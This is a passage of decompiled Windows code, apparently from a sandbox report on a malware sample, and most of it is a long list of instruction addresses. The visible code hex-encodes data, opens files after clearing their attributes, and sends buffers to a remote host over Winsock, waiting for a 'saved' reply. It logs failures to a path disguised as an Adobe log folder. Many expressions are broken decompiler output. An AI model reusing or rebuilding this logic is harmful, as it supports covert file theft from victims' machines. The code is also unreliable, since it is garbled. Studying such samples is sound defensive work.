                                                                    										_t529 = _t655 + "0123456789ABCDEF"; // 0x33323130
                                                                    										_t657 =  >=  ? _v56 :  &_v56;
                                                                    										 *((char*)(( >=  ? _v56 :  &_v56) + 2)) =  *_t529 & 0x000000ff;
                                                                    										_t659 = (_t1060 & 0x000000ff) >> 4;
                                                                    										__eflags = _v36 - 0x10;
                                                                    										_t534 = _t659 + "0123456789ABCDEF"; // 0x33323130
                                                                    										_t661 =  >=  ? _v56 :  &_v56;
                                                                    										 *((char*)(( >=  ? _v56 :  &_v56) + 3)) =  *_t534 & 0x000000ff;
                                                                    										_t663 = _t1060 & 0x0000000f;
                                                                    										__eflags = _v36 - 0x10;
                                                                    										_t539 = _t663 + "0123456789ABCDEF"; // 0x33323130
                                                                    										_t665 =  >=  ? _v56 :  &_v56;
                                                                    										 *((char*)(( >=  ? _v56 :  &_v56) + 4)) =  *_t539 & 0x000000ff;
                                                                    										E00E72EC0(_t957,  &_v56, _t1086, _v104);
                                                                    										__eflags = _v36 - 0x10;
                                                                    										_t668 =  >=  ? _v56 :  &_v56;
                                                                    										__imp__#19(_t1103,  >=  ? _v56 :  &_v56, _v40, 0);
                                                                    										_v64 = 0;
                                                                    										_v60 = 0;
                                                                    										_v64 = 0;
                                                                    										_v80 = 0;
                                                                    										_v60 = 0xf;
                                                                    										_v64 = 4;
                                                                    										_v80 = 0;
                                                                    										_v76 = 0;
                                                                    										_v12 = 2;
                                                                    										_t978 =  *(_t1086 + 0x10);
                                                                    										_v104 = _t978 >> 0x18;
                                                                    										_t959 = _t978 >> 0x10;
                                                                    										__eflags = _v60 - 0x10;
                                                                    										_t672 =  >=  ? _v80 :  &_v80;
                                                                    										 *( >=  ? _v80 :  &_v80) = _t978;
                                                                    										__eflags = _v60 - 0x10;
                                                                    										_t674 =  >=  ? _v80 :  &_v80;
                                                                    										( >=  ? _v80 :  &_v80)[0] = _t978 >> 8;
                                                                    										__eflags = _v60 - 0x10;
                                                                    										_t676 =  >=  ? _v80 :  &_v80;
                                                                    										( >=  ? _v80 :  &_v80)[0] = _t978 >> 0x10;
                                                                    										__eflags = _v60 - 0x10;
                                                                    										_t678 =  >=  ? _v80 :  &_v80;
                                                                    										( >=  ? _v80 :  &_v80)[0] = _v104;
                                                                    										__eflags = _v60 - 0x10;
                                                                    										_t680 =  >=  ? _v80 :  &_v80;
                                                                    										__imp__#19(_t1103,  >=  ? _v80 :  &_v80, _v64, 0);
                                                                    										__eflags =  *((intOrPtr*)(_t1086 + 0x14)) - 0x10;
                                                                    										_t681 =  *(_t1086 + 0x10);
                                                                    										if( *((intOrPtr*)(_t1086 + 0x14)) >= 0x10) {
                                                                    											_t1086 =  *_t1086;
                                                                    										}
                                                                    										__imp__#19(_t1103, _t1086, _t681, 0);
                                                                    										__imp__#16(_t1103,  &_v32, 5, 8); // executed
                                                                    										_t684 = E00EAF3B0( &_v32, "saved", 5);
                                                                    										__eflags = _t684;
                                                                    										if(_t684 != 0) {
                                                                    											_v12 = 1;
                                                                    											L00E83B80(_t959,  &_v80, _t1086);
                                                                    											_v12 = 0;
                                                                    											L00E83B80(_t959,  &_v56, _t1086);
                                                                    											goto L223;
                                                                    										} else {
                                                                    											__imp__#3(_t1103); // executed
                                                                    											_v12 = 1;
                                                                    											L00E83B80(_t959,  &_v80, _t1086);
                                                                    											_v12 = 0;
                                                                    											L00E83B80(_t959,  &_v56, _t1086);
                                                                    											_t954 = 1;
                                                                    										}
                                                                    									}
                                                                    									_v12 = 0xffffffff;
                                                                    									L00E83B80(_t954,  &_v0, _t1086);
                                                                    									 *[fs:0x0] = _v20;
                                                                    									__eflags = _v24 ^ _t1120;
                                                                    									return E00EA7663(_v24 ^ _t1120);
                                                                    								} else {
                                                                    									_t941 =  *0xf2c108; // 0x819360
                                                                    									E00E6F0E0(_t953,  *((intOrPtr*)(_t941 + _t1085 * 4)) + _v2028 * 8, _t1053, _v2024);
                                                                    									_t944 =  *0xf2c12c; // 0x81d240
                                                                    									E00EA5E5C( *((intOrPtr*)( *((intOrPtr*)(_t944 + _t1085 * 4)) + _v2028 * 4)));
                                                                    									_t948 = _a24;
                                                                    									_t1122 = _t1123 + 4;
                                                                    									goto L10;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							_t948 = _a24;
                                                                    							if(_t948 == 0) {
                                                                    								L14:
                                                                    								_t928 = E00E83430(_t953,  &_v2116, _t1102, _t1085, _t1102);
                                                                    								_v8 = 0;
                                                                    								_t929 = E00E73F90(_t953,  &_v2092, L" error:", _t928);
                                                                    								_t1143 = _t1122 + 4;
                                                                    								_v8 = 1;
                                                                    								if( *((intOrPtr*)(_t929 + 0x14)) >= 8) {
                                                                    									_t929 =  *_t929;
                                                                    								}
                                                                    								_t931 = E00E59DB0( &_v2048,  *_v2024, _t929);
                                                                    								_v8 = 2;
                                                                    								_push(0);
                                                                    								_push(0x7d0);
                                                                    								_v2036 = _t1143 - 0x18;
                                                                    								_push(L"\\ProgramData\\Adobe\\Extension Manager CC\\Logs\\fails.txt");
                                                                    								E00E73CB0(_t953, _t1143 - 0x18, L"\\\\?\\c:", _t1085);
                                                                    								_v8 = 3;
                                                                    								_v8 = 2;
                                                                    								E00E68470(_t953, 1, _t931);
                                                                    								_v8 = 1;
                                                                    								E00EAEBD8(_v2048);
                                                                    								_v8 = 0;
                                                                    								L00E59AF0(_t953,  &_v2092, _t1085);
                                                                    								_v8 = 0xffffffff;
                                                                    								L00E59AF0(_t953,  &_v2116, _t1085);
                                                                    							} else {
                                                                    								L10:
                                                                    								if(_t948 == 1 && _t1102 != 0x21 && _t1102 != 0x20 &&  *0xeef9d6 == 0) {
                                                                    									goto L14;
                                                                    								}
                                                                    							}
                                                                    							L200:
                                                                    							L201:
                                                                    							 *[fs:0x0] = _v16;
                                                                    							return E00EA7663(_v20 ^ _t1119);
                                                                    						}
                                                                    					} else {
                                                                    						_t1118 = _v2024;
                                                                    						E00E86F30( *_t1118, _t1118);
                                                                    						SetFileAttributesW( *_t1118, 0x80);
                                                                    						_v1952 = CreateFileW( *_t1118, 0x12019f, 3, 0, 3, 0x10000000, 0);
                                                                    						_t1102 = GetLastError();
                                                                    						_t607 = _v1952;
                                                                    						if(_t607 != 0xffffffff) {
                                                                    							_t1100 = _v1980;
                                                                    							goto L18;
                                                                    						} else {
                                                                    							goto L3;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L225:
                                                                    			}
































































































































































































































































                                                                    0x00e6c990
                                                                    0x00e6c990
                                                                    0x00e6c993
                                                                    0x00e6c995
                                                                    0x00e6c9a0
                                                                    0x00e6c9a1
                                                                    0x00e6c9a7
                                                                    0x00e6c9ac
                                                                    0x00e6c9ae
                                                                    0x00e6c9b1
                                                                    0x00e6c9b2
                                                                    0x00e6c9b3
                                                                    0x00e6c9b7
                                                                    0x00e6c9bd
                                                                    0x00e6c9bf
                                                                    0x00e6c9ca
                                                                    0x00e6c9cd
                                                                    0x00e6c9d6
                                                                    0x00e6c9df
                                                                    0x00e6c9e8
                                                                    0x00e6c9f1
                                                                    0x00e6c9f7
                                                                    0x00e6c9fd
                                                                    0x00e6ca31
                                                                    0x00e6ca3d
                                                                    0x00e6ca3f
                                                                    0x00e6ca45
                                                                    0x00e6ca4e
                                                                    0x00e6cc22
                                                                    0x00e6cc22
                                                                    0x00e6cc25
                                                                    0x00e6cc28
                                                                    0x00e6cc2f
                                                                    0x00e6cc35
                                                                    0x00e6cc37
                                                                    0x00e6cc40
                                                                    0x00e6cc44
                                                                    0x00e6cc48
                                                                    0x00e6cc4d
                                                                    0x00e6cc53
                                                                    0x00e6cc53
                                                                    0x00e6cc5f
                                                                    0x00e6cc6b
                                                                    0x00e6cc75
                                                                    0x00e6cc7b
                                                                    0x00e6cc7d
                                                                    0x00e6cc7f
                                                                    0x00e6cc82
                                                                    0x00e6cc82
                                                                    0x00e6cc8a
                                                                    0x00e6cc92
                                                                    0x00e6cc98
                                                                    0x00e6cc9a
                                                                    0x00e6cca0
                                                                    0x00e6cca6
                                                                    0x00e6ccc5
                                                                    0x00e6cccf
                                                                    0x00e6ccd9
                                                                    0x00e6ccdb
                                                                    0x00e6cd9d
                                                                    0x00e6cd9d
                                                                    0x00e6cda5
                                                                    0x00e6cda7
                                                                    0x00e6cdab
                                                                    0x00e6cdae
                                                                    0x00e6cdb4
                                                                    0x00e6cea6
                                                                    0x00e6cea6
                                                                    0x00e6cea9
                                                                    0x00000000
                                                                    0x00e6cdba
                                                                    0x00e6cdba
                                                                    0x00e6cdc4
                                                                    0x00e6cdc4
                                                                    0x00e6cdc7
                                                                    0x00e6cdcd
                                                                    0x00e6cdd0
                                                                    0x00e6ceb7
                                                                    0x00e6ceb7
                                                                    0x00e6ceb9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6cdd6
                                                                    0x00e6cddc
                                                                    0x00e6cdde
                                                                    0x00e6cde0
                                                                    0x00e6cde6
                                                                    0x00e6cde6
                                                                    0x00e6cdf0
                                                                    0x00e6cdf0
                                                                    0x00e6cdf3
                                                                    0x00e6cdf6
                                                                    0x00e6cdf6
                                                                    0x00e6cdff
                                                                    0x00e6cdff
                                                                    0x00e6ce02
                                                                    0x00e6ce04
                                                                    0x00e6ce07
                                                                    0x00e6ce07
                                                                    0x00e6ce0b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ce0d
                                                                    0x00e6ce10
                                                                    0x00e6ce10
                                                                    0x00e6ce13
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ce15
                                                                    0x00000000
                                                                    0x00e6ce13
                                                                    0x00e6ce17
                                                                    0x00e6ce1a
                                                                    0x00e6ce1a
                                                                    0x00e6ce20
                                                                    0x00e6ce20
                                                                    0x00e6ce25
                                                                    0x00e6ce2b
                                                                    0x00e6ce31
                                                                    0x00e6ce33
                                                                    0x00e6ce55
                                                                    0x00e6ce55
                                                                    0x00e6ce60
                                                                    0x00e6ce65
                                                                    0x00e6ce67
                                                                    0x00e6ce72
                                                                    0x00e6ce72
                                                                    0x00e6ce78
                                                                    0x00e6ce7b
                                                                    0x00e6ce9c
                                                                    0x00e6ce9e
                                                                    0x00000000
                                                                    0x00e6ce7d
                                                                    0x00e6ce7d
                                                                    0x00e6ce7f
                                                                    0x00e6cebb
                                                                    0x00e6cebe
                                                                    0x00e6cec1
                                                                    0x00e6cece
                                                                    0x00e6ced7
                                                                    0x00e6cedd
                                                                    0x00e6cee3
                                                                    0x00e6cee8
                                                                    0x00e6ceee
                                                                    0x00e6cef2
                                                                    0x00e6cef5
                                                                    0x00e6cef7
                                                                    0x00e6cf37
                                                                    0x00e6cf37
                                                                    0x00e6cef9
                                                                    0x00e6cef9
                                                                    0x00e6cf03
                                                                    0x00e6cf12
                                                                    0x00e6cf15
                                                                    0x00e6cf25
                                                                    0x00e6cf2a
                                                                    0x00e6cf2c
                                                                    0x00e6cf2f
                                                                    0x00e6cefb
                                                                    0x00e6cefb
                                                                    0x00e6cf01
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6cf01
                                                                    0x00e6cef9
                                                                    0x00e6cef7
                                                                    0x00e6ce69
                                                                    0x00e6ce69
                                                                    0x00e6ce70
                                                                    0x00e6ceb1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ce70
                                                                    0x00e6ce35
                                                                    0x00e6ce35
                                                                    0x00e6ce38
                                                                    0x00e6ce3d
                                                                    0x00e6ce40
                                                                    0x00e6ce42
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ce44
                                                                    0x00e6ce4a
                                                                    0x00e6ce4d
                                                                    0x00e6ce53
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ce53
                                                                    0x00e6ce87
                                                                    0x00e6ce8e
                                                                    0x00e6ce8e
                                                                    0x00e6ce91
                                                                    0x00e6ce91
                                                                    0x00e6ce33
                                                                    0x00e6cdbc
                                                                    0x00e6cdbc
                                                                    0x00e6cdbe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6cdbe
                                                                    0x00e6cdba
                                                                    0x00e6cf3a
                                                                    0x00e6cf3a
                                                                    0x00e6cf47
                                                                    0x00e6cf53
                                                                    0x00e6cf5d
                                                                    0x00e6cf63
                                                                    0x00e6cf68
                                                                    0x00e6d078
                                                                    0x00e6d07d
                                                                    0x00e6d083
                                                                    0x00e6d088
                                                                    0x00e6d08e
                                                                    0x00e6d093
                                                                    0x00e6d099
                                                                    0x00e6d09e
                                                                    0x00e6d0a4
                                                                    0x00e6d0a9
                                                                    0x00e6d0b3
                                                                    0x00e6d0b9
                                                                    0x00e6d0bf
                                                                    0x00e6d0c4
                                                                    0x00e6d0c7
                                                                    0x00e6d0c9
                                                                    0x00000000
                                                                    0x00e6d0cf
                                                                    0x00e6d0db
                                                                    0x00e6d0e3
                                                                    0x00000000
                                                                    0x00e6d0e3
                                                                    0x00e6cf6e
                                                                    0x00e6cf6e
                                                                    0x00e6cf73
                                                                    0x00e6cf76
                                                                    0x00e6cf78
                                                                    0x00000000
                                                                    0x00e6cf7e
                                                                    0x00e6cf7e
                                                                    0x00e6cf83
                                                                    0x00e6cf89
                                                                    0x00e6cf8e
                                                                    0x00e6cf94
                                                                    0x00e6cf99
                                                                    0x00e6cf9f
                                                                    0x00e6cfa5
                                                                    0x00e6cfb1
                                                                    0x00e6cfbe
                                                                    0x00e6cfc3
                                                                    0x00e6cfc9
                                                                    0x00e6cfcc
                                                                    0x00e6cfd3
                                                                    0x00e6cfd9
                                                                    0x00e6cfdf
                                                                    0x00e6cfe6
                                                                    0x00e6cff2
                                                                    0x00e6cff4
                                                                    0x00e6cffa
                                                                    0x00e6d000
                                                                    0x00e6d006
                                                                    0x00e6d00d
                                                                    0x00e6d013
                                                                    0x00e6d01a
                                                                    0x00e6d01c
                                                                    0x00e6d01f
                                                                    0x00e6d025
                                                                    0x00e6d02c
                                                                    0x00e6d02f
                                                                    0x00e6d035
                                                                    0x00e6d043
                                                                    0x00e6d057
                                                                    0x00e6d05c
                                                                    0x00e6d062
                                                                    0x00e6d070
                                                                    0x00e6d037
                                                                    0x00e6d037
                                                                    0x00e6d03d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d03d
                                                                    0x00e6d035
                                                                    0x00e6d0e6
                                                                    0x00e6d0eb
                                                                    0x00e6d0f0
                                                                    0x00e6d0f3
                                                                    0x00e6d0f5
                                                                    0x00e6d115
                                                                    0x00e6d0f7
                                                                    0x00e6d0f7
                                                                    0x00e6d101
                                                                    0x00e6d101
                                                                    0x00e6d106
                                                                    0x00e6d110
                                                                    0x00e6d0f9
                                                                    0x00e6d0f9
                                                                    0x00e6d0fc
                                                                    0x00e6d0ff
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d0ff
                                                                    0x00e6d0f7
                                                                    0x00e6d118
                                                                    0x00e6d11e
                                                                    0x00e6d126
                                                                    0x00e6d129
                                                                    0x00e6d12d
                                                                    0x00e6d135
                                                                    0x00e6d138
                                                                    0x00e6d13e
                                                                    0x00e6d144
                                                                    0x00e6d146
                                                                    0x00e6d148
                                                                    0x00e6d152
                                                                    0x00e6d152
                                                                    0x00e6d166
                                                                    0x00e6d166
                                                                    0x00e6d16e
                                                                    0x00e6d174
                                                                    0x00e6d176
                                                                    0x00e6d14a
                                                                    0x00e6d14a
                                                                    0x00e6d150
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d150
                                                                    0x00e6d148
                                                                    0x00e6d17c
                                                                    0x00e6d183
                                                                    0x00e6d18e
                                                                    0x00e6d1a1
                                                                    0x00e6d1b1
                                                                    0x00e6d1b6
                                                                    0x00e6d1b9
                                                                    0x00e6d1c3
                                                                    0x00e6d1ca
                                                                    0x00e6d1cc
                                                                    0x00e6d1d8
                                                                    0x00e6d1df
                                                                    0x00e6d1e6
                                                                    0x00e6d1ec
                                                                    0x00e6d1f2
                                                                    0x00e6d1f4
                                                                    0x00e6d1fa
                                                                    0x00e6d1fc
                                                                    0x00e6d201
                                                                    0x00e6d201
                                                                    0x00e6d203
                                                                    0x00e6d209
                                                                    0x00e6d209
                                                                    0x00e6d20f
                                                                    0x00e6d212
                                                                    0x00e6d214
                                                                    0x00e6d216
                                                                    0x00e6d223
                                                                    0x00e6d229
                                                                    0x00e6d22e
                                                                    0x00e6d22e
                                                                    0x00e6d216
                                                                    0x00e6d212
                                                                    0x00e6d23d
                                                                    0x00e6d245
                                                                    0x00e6d256
                                                                    0x00e6d261
                                                                    0x00e6d26b
                                                                    0x00e6d278
                                                                    0x00e6d27d
                                                                    0x00e6d286
                                                                    0x00e6d28b
                                                                    0x00e6d28d
                                                                    0x00e6d28f
                                                                    0x00e6d29c
                                                                    0x00e6d2a0
                                                                    0x00e6d2a7
                                                                    0x00e6d2ab
                                                                    0x00e6d2b2
                                                                    0x00e6d2b6
                                                                    0x00e6d2b6
                                                                    0x00e6d2c7
                                                                    0x00e6d2cb
                                                                    0x00e6d2ce
                                                                    0x00e6d2d7
                                                                    0x00e6d2e6
                                                                    0x00e6d2ec
                                                                    0x00e6d2f5
                                                                    0x00e6d2f7
                                                                    0x00e6d2f9
                                                                    0x00e6d2fa
                                                                    0x00e6d2fd
                                                                    0x00e6d301
                                                                    0x00e6d305
                                                                    0x00e6d30a
                                                                    0x00e6d30d
                                                                    0x00e6d311
                                                                    0x00e6d312
                                                                    0x00e6d317
                                                                    0x00e6d31c
                                                                    0x00e6d323
                                                                    0x00e6d32d
                                                                    0x00e6d331
                                                                    0x00e6d336
                                                                    0x00e6d33c
                                                                    0x00e6d340
                                                                    0x00e6d341
                                                                    0x00e6d34b
                                                                    0x00e6d351
                                                                    0x00e6d352
                                                                    0x00e6d356
                                                                    0x00e6d36b
                                                                    0x00e6d374
                                                                    0x00e6d375
                                                                    0x00e6d37a
                                                                    0x00e6d37b
                                                                    0x00e6d380
                                                                    0x00e6d38b
                                                                    0x00e6d390
                                                                    0x00e6d39c
                                                                    0x00e6d39f
                                                                    0x00e6d3a8
                                                                    0x00e6d3a8
                                                                    0x00e6d3ab
                                                                    0x00e6d3b1
                                                                    0x00e6d3b7
                                                                    0x00e6d3b9
                                                                    0x00e6d3c0
                                                                    0x00e6d3c0
                                                                    0x00e6d3c1
                                                                    0x00e6d3c6
                                                                    0x00e6d3c9
                                                                    0x00e6d3cf
                                                                    0x00e6d3cf
                                                                    0x00e6d3d8
                                                                    0x00e6d3eb
                                                                    0x00e6d3f0
                                                                    0x00e6d3f3
                                                                    0x00e6d3f6
                                                                    0x00e6d400
                                                                    0x00e6d400
                                                                    0x00e6d403
                                                                    0x00e6d406
                                                                    0x00e6d406
                                                                    0x00e6d406
                                                                    0x00e6d40d
                                                                    0x00e6d416
                                                                    0x00e6d41c
                                                                    0x00e6d422
                                                                    0x00e6d425
                                                                    0x00e6d42b
                                                                    0x00e6d431
                                                                    0x00e6d436
                                                                    0x00e6d43c
                                                                    0x00e6d443
                                                                    0x00e6d44b
                                                                    0x00e6d454
                                                                    0x00e6d45a
                                                                    0x00e6d45a
                                                                    0x00e6d45d
                                                                    0x00e6d463
                                                                    0x00e6d470
                                                                    0x00e6d476
                                                                    0x00e6d47b
                                                                    0x00e6d47e
                                                                    0x00e6d484
                                                                    0x00e6d484
                                                                    0x00e6d488
                                                                    0x00e6d490
                                                                    0x00e6d492
                                                                    0x00e6d498
                                                                    0x00e6d49f
                                                                    0x00e6d981
                                                                    0x00e6d987
                                                                    0x00e6d98d
                                                                    0x00e6d993
                                                                    0x00000000
                                                                    0x00e6d4a5
                                                                    0x00e6d4a5
                                                                    0x00e6d4ab
                                                                    0x00000000
                                                                    0x00e6d4b1
                                                                    0x00e6d4b1
                                                                    0x00e6d4bf
                                                                    0x00e6d4bf
                                                                    0x00e6d4c8
                                                                    0x00e6d4ce
                                                                    0x00e6d4d2
                                                                    0x00e6d4d7
                                                                    0x00e6d4dd
                                                                    0x00e6d4e3
                                                                    0x00e6d4e9
                                                                    0x00e6d4f0
                                                                    0x00e6d4f0
                                                                    0x00e6d4fc
                                                                    0x00e6d504
                                                                    0x00e6d506
                                                                    0x00e6d50c
                                                                    0x00e6d513
                                                                    0x00e6d519
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d522
                                                                    0x00e6d525
                                                                    0x00000000
                                                                    0x00e6d527
                                                                    0x00e6d527
                                                                    0x00e6d529
                                                                    0x00e6d53c
                                                                    0x00e6d555
                                                                    0x00e6d56b
                                                                    0x00e6d570
                                                                    0x00e6d575
                                                                    0x00e6d577
                                                                    0x00e6dc22
                                                                    0x00e6dc22
                                                                    0x00e6dc24
                                                                    0x00e6dc29
                                                                    0x00e6dc30
                                                                    0x00000000
                                                                    0x00e6d57d
                                                                    0x00e6d57d
                                                                    0x00e6d583
                                                                    0x00000000
                                                                    0x00e6d589
                                                                    0x00e6d589
                                                                    0x00e6d58b
                                                                    0x00e6d592
                                                                    0x00e6d597
                                                                    0x00e6d597
                                                                    0x00e6d7b5
                                                                    0x00e6d7bb
                                                                    0x00e6d7c3
                                                                    0x00e6d7c5
                                                                    0x00e6d7c7
                                                                    0x00e6d7d5
                                                                    0x00e6d7db
                                                                    0x00e6d7db
                                                                    0x00e6d7e2
                                                                    0x00e6d7ea
                                                                    0x00e6d7f7
                                                                    0x00e6d80e
                                                                    0x00e6d813
                                                                    0x00e6d816
                                                                    0x00e6d818
                                                                    0x00e6d818
                                                                    0x00e6d81e
                                                                    0x00e6d820
                                                                    0x00e6d833
                                                                    0x00e6d849
                                                                    0x00e6d84f
                                                                    0x00e6d851
                                                                    0x00e6d854
                                                                    0x00e6d859
                                                                    0x00e6d859
                                                                    0x00e6d85c
                                                                    0x00e6d863
                                                                    0x00e6dc36
                                                                    0x00e6dc36
                                                                    0x00e6dc3c
                                                                    0x00e6dc40
                                                                    0x00e6dca6
                                                                    0x00e6dca6
                                                                    0x00e6dcad
                                                                    0x00e6dcbb
                                                                    0x00e6dcc0
                                                                    0x00e6dcd3
                                                                    0x00e6dcd8
                                                                    0x00e6dcdb
                                                                    0x00e6dcdf
                                                                    0x00e6dce3
                                                                    0x00e6dce5
                                                                    0x00e6dce5
                                                                    0x00e6dcf6
                                                                    0x00e6dcfd
                                                                    0x00e6dd06
                                                                    0x00e6dd08
                                                                    0x00e6dd0d
                                                                    0x00e6dd12
                                                                    0x00e6dd18
                                                                    0x00e6dd1d
                                                                    0x00e6dd25
                                                                    0x00e6dd29
                                                                    0x00e6dd34
                                                                    0x00e6dd39
                                                                    0x00e6dd43
                                                                    0x00e6dd48
                                                                    0x00e6dd4b
                                                                    0x00e6dd55
                                                                    0x00e6dd5a
                                                                    0x00e6dd67
                                                                    0x00e6dd67
                                                                    0x00000000
                                                                    0x00e6dc42
                                                                    0x00e6dc42
                                                                    0x00e6dc45
                                                                    0x00e6dc4c
                                                                    0x00e6dc52
                                                                    0x00e6dc58
                                                                    0x00e6dc5b
                                                                    0x00e6dc67
                                                                    0x00e6dc6c
                                                                    0x00e6dc6f
                                                                    0x00e6dc71
                                                                    0x00000000
                                                                    0x00e6dc77
                                                                    0x00e6dc77
                                                                    0x00e6dc88
                                                                    0x00e6dc8d
                                                                    0x00e6dc99
                                                                    0x00e6dc9e
                                                                    0x00e6dd6c
                                                                    0x00e6dd72
                                                                    0x00e6dd77
                                                                    0x00e6dd7d
                                                                    0x00e6dd80
                                                                    0x00e6dd82
                                                                    0x00e6dd85
                                                                    0x00e6dd8a
                                                                    0x00e6dd8a
                                                                    0x00e6dd93
                                                                    0x00e6dd9f
                                                                    0x00e6dda5
                                                                    0x00e6ddab
                                                                    0x00e6ddad
                                                                    0x00e6ddb0
                                                                    0x00e6ddb0
                                                                    0x00e6ddc2
                                                                    0x00e6ddc9
                                                                    0x00000000
                                                                    0x00e6ddce
                                                                    0x00e6dc47
                                                                    0x00e6dc47
                                                                    0x00e6dc4a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6dc4a
                                                                    0x00e6dc45
                                                                    0x00e6d869
                                                                    0x00e6d869
                                                                    0x00e6d870
                                                                    0x00e6d8dc
                                                                    0x00e6d8dc
                                                                    0x00e6d8e2
                                                                    0x00e6d8e8
                                                                    0x00e6d8e8
                                                                    0x00e6d8ea
                                                                    0x00e6d8f0
                                                                    0x00e6d8f6
                                                                    0x00000000
                                                                    0x00e6d8fc
                                                                    0x00e6d8fc
                                                                    0x00e6d90a
                                                                    0x00e6d90a
                                                                    0x00e6d910
                                                                    0x00e6d916
                                                                    0x00000000
                                                                    0x00e6d8fe
                                                                    0x00e6d8fe
                                                                    0x00e6d904
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d904
                                                                    0x00e6d8fc
                                                                    0x00e6d872
                                                                    0x00e6d87e
                                                                    0x00e6d88d
                                                                    0x00e6d899
                                                                    0x00e6d89b
                                                                    0x00e6d8a1
                                                                    0x00e6d8a7
                                                                    0x00e6d8a9
                                                                    0x00e6d8af
                                                                    0x00e6d921
                                                                    0x00e6d927
                                                                    0x00e6d933
                                                                    0x00e6d945
                                                                    0x00e6d947
                                                                    0x00e6d953
                                                                    0x00e6d959
                                                                    0x00e6d95b
                                                                    0x00e6d99b
                                                                    0x00e6d99b
                                                                    0x00e6d95d
                                                                    0x00e6d95d
                                                                    0x00e6d963
                                                                    0x00e6d96f
                                                                    0x00e6d971
                                                                    0x00e6d977
                                                                    0x00e6d979
                                                                    0x00e6d95f
                                                                    0x00e6d95f
                                                                    0x00e6d961
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d961
                                                                    0x00e6d95d
                                                                    0x00e6d9a1
                                                                    0x00e6d9a1
                                                                    0x00e6d9a3
                                                                    0x00e6d9b7
                                                                    0x00e6d9bd
                                                                    0x00e6d9bf
                                                                    0x00e6d9d2
                                                                    0x00e6d9d8
                                                                    0x00e6d9de
                                                                    0x00e6d9ee
                                                                    0x00e6d9fa
                                                                    0x00e6da00
                                                                    0x00e6da02
                                                                    0x00e6da05
                                                                    0x00e6da0a
                                                                    0x00e6da0a
                                                                    0x00e6da22
                                                                    0x00e6da3c
                                                                    0x00e6da42
                                                                    0x00e6da44
                                                                    0x00e6da59
                                                                    0x00e6da73
                                                                    0x00e6da7e
                                                                    0x00e6da81
                                                                    0x00e6da87
                                                                    0x00e6da95
                                                                    0x00e6da9b
                                                                    0x00e6daa1
                                                                    0x00e6daab
                                                                    0x00e6daad
                                                                    0x00000000
                                                                    0x00e6dab3
                                                                    0x00e6dab3
                                                                    0x00e6dab9
                                                                    0x00000000
                                                                    0x00e6dabf
                                                                    0x00e6dabf
                                                                    0x00e6dabf
                                                                    0x00e6dac5
                                                                    0x00e6dac7
                                                                    0x00e6dad5
                                                                    0x00e6dad7
                                                                    0x00e6dae6
                                                                    0x00e6daf8
                                                                    0x00e6db0c
                                                                    0x00e6db15
                                                                    0x00e6db1a
                                                                    0x00e6db1a
                                                                    0x00e6db1d
                                                                    0x00e6db1f
                                                                    0x00e6db32
                                                                    0x00e6db32
                                                                    0x00e6db3e
                                                                    0x00e6db4f
                                                                    0x00e6db55
                                                                    0x00e6db57
                                                                    0x00e6db70
                                                                    0x00e6db8b
                                                                    0x00e6db91
                                                                    0x00e6db93
                                                                    0x00e6db96
                                                                    0x00e6db9b
                                                                    0x00e6db9b
                                                                    0x00e6dba4
                                                                    0x00e6dbb0
                                                                    0x00e6dbb7
                                                                    0x00e6dbbc
                                                                    0x00e6dbc5
                                                                    0x00e6dbc7
                                                                    0x00e6dbca
                                                                    0x00e6dbcf
                                                                    0x00e6dbd2
                                                                    0x00e6dbd9
                                                                    0x00e6dbdf
                                                                    0x00e6dbe5
                                                                    0x00e6dbe7
                                                                    0x00e6dbea
                                                                    0x00e6dbea
                                                                    0x00e6dbf0
                                                                    0x00e6dbf6
                                                                    0x00e6dbf8
                                                                    0x00e6dbfb
                                                                    0x00e6dbfb
                                                                    0x00e6dc01
                                                                    0x00e6dc06
                                                                    0x00e6dc10
                                                                    0x00e6dc10
                                                                    0x00e6dc13
                                                                    0x00e6dc16
                                                                    0x00e6dc16
                                                                    0x00e6dc16
                                                                    0x00000000
                                                                    0x00e6db59
                                                                    0x00e6db5a
                                                                    0x00e6db60
                                                                    0x00e6db65
                                                                    0x00e6db68
                                                                    0x00e6db6a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6db6a
                                                                    0x00e6db21
                                                                    0x00e6db22
                                                                    0x00e6db27
                                                                    0x00e6db2a
                                                                    0x00e6db2c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6db2c
                                                                    0x00e6db1f
                                                                    0x00e6dab9
                                                                    0x00e6d9c1
                                                                    0x00e6d9c2
                                                                    0x00e6d9c7
                                                                    0x00e6d9ca
                                                                    0x00e6d9cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d9cc
                                                                    0x00e6d8b1
                                                                    0x00e6d8b1
                                                                    0x00e6d8bb
                                                                    0x00e6d8bb
                                                                    0x00e6d8d6
                                                                    0x00000000
                                                                    0x00e6d8b3
                                                                    0x00e6d8b3
                                                                    0x00e6d8b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d8b9
                                                                    0x00e6d8b1
                                                                    0x00e6d8af
